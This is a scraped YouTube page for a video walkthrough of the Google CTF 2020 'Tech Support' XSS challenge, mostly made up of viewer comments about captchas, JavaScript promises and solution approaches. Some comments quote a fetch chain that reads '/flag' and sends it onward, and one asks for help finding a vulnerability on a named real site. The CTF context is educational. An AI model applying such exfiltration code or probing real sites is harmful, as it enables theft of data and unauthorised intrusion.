XSS on the Wrong Domain T_T - Tech Support (web) Google CTF 2020
ฝัง
- เผยแพร่เมื่อ 2 ต.ค. 2024
- Try chatting with tech support about getting a flag. There is a very easy XSS in the support chat, but the problem is, the XSS is on the wrong domain. So we can't easily grab the flag.
Challenge: capturetheflag...
Tech Support: typeselfsub.we...
=[ ❤️ Support ]=
→ per Video: / liveoverflow
→ per Month: / @liveoverflow
=[ 🐕 Social ]=
→ Twitter: / liveoverflow
→ Website: liveoverflow.com/
→ Subreddit: / liveoverflow
→ Facebook: / liveoverflow
Don't spend money on courses
Overflow is gaining such a deep understanding of computers that he's becoming one. How long before he can't beat recapcha
"Or whatever, so no clue. But in the end, still solved it. Who cares."
Every coder ever.
1:15 -> I think you did a bunch of those capchas wrong.
When it says it wants the traffic lights, you selected the poles as well.
that feeling when the captcha thinks motorcycles and bicycles are the same thing.
That's because the poles have traffic lights on them
It's google using the CTF players as free workers. If you want the flag work 5 min for us :D
Konrad W correct
he a robot
The endless reCaptcha looks about normal for when I use Tor.
Underrated comment..
ya lol, that's why I don't use it
today I found a vulnerability at my job's codebase. Essentially arbitrary file deletion.. patched that real quick.
I like to think your videos gave me the thinking patterns needed to be able to spot this vulnerability. Thank you!
Give some more details please :)
@@Lolo5 hmmm, no sorry :)
@@TheGrimravager what was the type of vulnerability, if you want to tell that.
@@ScorpioneOrzion essentially arbitrary file deletion due to a non-sanitized call to php's unlink function. But luckily most files were not writable by the user that would execute the php-script
Nice
Your usage of Promises is ... interesting ...
The purpose of Promises is exactly to avoid the nesting you are doing and that you would usually get when using callbacks.
You can just do this:
fetch("/flag").then(r => r.text()).then(t => fetch(...))
I think modern chrome supports `await` in console too
@@akuviljanen4695 only in an async function as the exploit is not run in console
Fortunately it's easy to wrap everything into an async lambda
Very good info.
Lol i did that too before learning how promises work
There is also an solution where you find the username/password in the document.referer.
github.com/weibell/ctf-google2020/tree/master/tech-support
13:39, 2 second too long :'(
He should have sped up the intro just to make it fit.
Imagine being on the other end of this... You open up a ticket from a user and suddenly two little embedded windows open and your password is leaked
those nested Promise#then calls cause me pain 😶
Managarmr is so awkward to pronounce 😂😂😂😂
Manager Mr
Should be smoother if it’s your teammate tho?
Testing for XSS in all fields of my page RN 😅
I recently started to learn some Web Application pen-testing, and a lot of the things here finally made sense for me, thank you for your detailed explanation.
Bro i was eagerly waiting for this since 1 week...
As a newbie, i wanted the walkthrough.
Thank you so much bro
Hi, can you do a video writeup for the mathsh challenge from GoogleCTF? I am searching for a writeup of that challenge since the end of the CTF. I worked on that challenge for many hours but couldn't clear it, and I would just want to know if I was on the right track.
If you want to get through captchas faster, only check 3 boxes. No more, no less.
wtf is that captcha lmfao
Where can I learn this stuff????
In your XSS when you have typed "fetch('/flag').then( r => { ....." What is "r"? Is it the "response" of the fetch request?
idk much javascript but probably that is r a custom function so is t
Of course, it is the actual response if no error ocurred in the (hopefully present) ".catch(err => { /** **/ })" function.
developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch
@@malloc8634 nice
I think people with extensive knowledge about client-side would understand this haha
🤯🤯🤯... looking this for the 5. time
Try using promises .... thats what I thought when I saw timeouts...
hi i'm pretty new to hacking and i wanted to try to find a vuln in iitianspace.com/login.php pls help
Wow amazing video I love it but I better understand in hindi language
If anyone have tried using CSRF it does not work because admin can not change his address. Only normal users can do. So, you have to use some technique like preload an like this man did. Or just check the document.referrer
jesus christ, where does one even begins to solve that
1:00 Wait a second how is there a traffic light in the last box he clicks? I would have failed that captcha...
edit: nvm, it was him who failed the captchas lol
Have you played the CSAW? I saw team ALLES, it's yours right? How did it went?
great stuff, didn't know self-xss was vulnerable in this way!
Me neither! This is very good to know
Awesome video, thanks!
PWN challenges please!!!
could u get us deeper into sdr? would be great!
u see from doing ctfs and watching videos i was able to follow i was like wow i really learned a lot i can follow this until about 6 minutes the i was like -_- what
2:23 learn how to use promises man
Do you like John Hammond?
1:30 that's a lot of dedication
When I read the flag name, I sometimes think I could of guest that
That's great except for the no brute forcing flags condition on ctf's :)
Why don't you use Firefox?
Why don’t you use Chrome?
@@LiveOverflow it eats ram (and is slower than Firefox on my PC)
@@zsin128 lol you're out here fighting about browsers, while im out here curling the page and imagining what it looks like im my head
P.S. I donot recommend that, not fun
Why don't you use Internet Explorer?
Come on... Next
Gibe me Next video LiverFlow!!!
Hello brother, Can I ask you some questions?
You told, you using linux in docker. How to set up linux in docker to get the external IP?
google is your friend
that captcha tho...😅
Do you think that with the passage of time, the systems will be more secure and hacking will be almost impossible (or unnecessary)?
No
Are you sure that setTimeout actually does anything? I've run into issues before when trying to use setTimeout to control a data flow - it's still all executed instantly and doesn't work the same way as async/await/promise.
setTimeout, at least in my experience, works, but he should've used async/await or promises on this case
If you have some doubts or think you need some more insight on setTimeout i suggest you to search on youtube "what the heck is event loop anyway" it's a video of around 26 minutes which gives a good insight on the event loop and how sometimes setTimeout is used in the wrong way. Hope this helps
*captcha lol*
Team pasten wants to know your location
I passed the captcha in 2 trials lol😂
Funny, I solved this guy using the referrer. I guess it was not intended solution
Do you have a write up (or short explanation) of your solution? I'm very interested in it
Is there CTF for begineers? Or something like that?
Take a look at PicoCTF
Less Smoked Leet Chicken
WOW im early. 4 min ago
🧐👍🤝🤜👌
"who cares" in a nutshell in this video...XD
I wish I had that knowledge 😑
wish I could understand this .
wha?
i don't understand anything
The short version:
The tech support app has a bug in it that allows you to post content that will be parsed as Javascript. This is a major security vulnerability known as xss.
The point of the challenge is to get the Google bot to leak out his cookie by having it trigger your inserted malicious Javascript code.
But you can't simply grab the cookie and send it back to you because the CORS check will block it. So the solution is you have to do all kinds of acrobatics with your Javascript code and a second XSS to walk the Google bot around the site and log in and out on different sessions.
Understandable. I had to watch it 3 times to understand it